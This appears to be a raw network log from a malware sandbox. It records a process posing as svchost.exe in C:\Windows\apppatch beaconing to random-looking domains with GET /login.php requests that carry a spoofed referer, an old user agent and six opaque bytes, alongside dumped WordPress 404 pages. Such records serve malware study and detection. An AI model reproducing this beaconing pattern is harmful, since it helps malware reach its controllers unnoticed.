                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65
                                                                                                                                                                                                              Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66
                                                                                                                                                                                                              Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b
                                                                                                                                                                                                              Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73
                                                                                                                                                                                                              Data Ascii: ='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-s
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32
                                                                                                                                                                                                              Data Ascii: ht:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65
                                                                                                                                                                                                              Data Ascii: 0404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74
                                                                                                                                                                                                              Data Ascii: ngle-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC1369INData Raw: 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22
                                                                                                                                                                                                              Data Ascii: focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.464293188.114.97.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:48:24 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:48:24 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:48:27 UTC905INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:27 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="81.7",amp_style_sanitizer;dur="46.2",amp_tag_and_attribute_sanitizer;dur="20.1",amp_optimizer;dur="26.5"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=balnk2OvRjmNFcWhCfW3sIe0dyET%2BLYvCnEMC1tn9XQe08uQgblv9beXs6s7gU4IaqoAot%2F04MHquKG%2Bf0cjRHxz0I8PWTBuCcT%2FbvCj%2F2DJu3PPeumy%2BEGbx2S6sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c970c88ca43b1-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:48:27 UTC464INData Raw: 37 63 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c28<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-08-23 16:48:27 UTC1369INData Raw: 33 31 34 31 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a
                                                                                                                                                                                                              Data Ascii: 31415000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.464296188.114.97.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:48:29 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:48:29 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:48:31 UTC901INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:30 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="52.8",amp_style_sanitizer;dur="26.4",amp_tag_and_attribute_sanitizer;dur="19.6",amp_optimizer;dur="27.1"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NfVqjriKKpLNfWAxfKuGGleCENU59WoMf0jwbq8Zs%2BUx7hxro3JyzI0jHO8AsLpCnI7RHtps24XGtsL1%2BRfXBF6ZMqJX0LM%2FkLmmj5P1H7gpGNhn%2BP0jX0oc7JEvQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c9727ae7a0f74-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:48:31 UTC468INData Raw: 37 63 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c2c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-08-23 16:48:31 UTC1369INData Raw: 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78
                                                                                                                                                                                                              Data Ascii: 5000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-tex


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              8192.168.2.456397188.114.96.3443
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:49:01 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:49:01 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:49:02 UTC761INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:49:02 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOxX7ZabhGJtfHcIlKhKSvMyDxoHTvb5m8dF9kdoeh%2B%2FLcF8uGcdWD2q19o7JMHbyobMrjO%2BExr91qzbJpD3jEOXwle4sVyhIRHmx7MSjw%2Bfoi7hVrSc6BxHtOzYNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c97f05e457c82-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:49:02 UTC608INData Raw: 37 63 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7cb7<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-08-23 16:49:02 UTC1369INData Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65
                                                                                                                                                                                                              Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
